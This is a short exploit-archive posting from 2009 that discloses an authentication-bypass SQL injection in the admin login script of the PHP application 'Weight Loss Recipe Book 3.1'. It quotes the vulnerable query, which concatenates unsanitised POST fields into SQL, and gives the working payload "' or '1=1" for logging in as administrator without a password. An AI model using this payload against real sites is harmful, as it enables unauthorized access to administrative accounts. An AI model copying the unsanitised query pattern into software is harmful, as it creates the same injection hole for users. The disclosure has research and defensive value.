[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Weight Loss Recipe Book 3.1 (Auth Bypass) SQL Injection Vuln
# Published : 2009-01-11
# Author : x0r
# Previous Title : BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection Vulnerability
# Next Title : PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability


###############################
# Weight Loss Recipe Book 3.1 #
###############################

Autore: x0r
Emails: x0r@live.it  andry2000@hotmail.it
Cms Site: http://www.my-health-and-fitness.org/weight-loss-recipe-book.html
################################

Bug In wlrb_filesadmin-login.php

SELECT *
				FROM ' . $program_prefix . 'administrators
				WHERE administrators_username = "' . $_POST['administrators_username']
. '" and
					administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
					
Exploit: ' or '1=1

##############################

Greetz: EdGaR :P

# www.Syue.com [2009-01-11]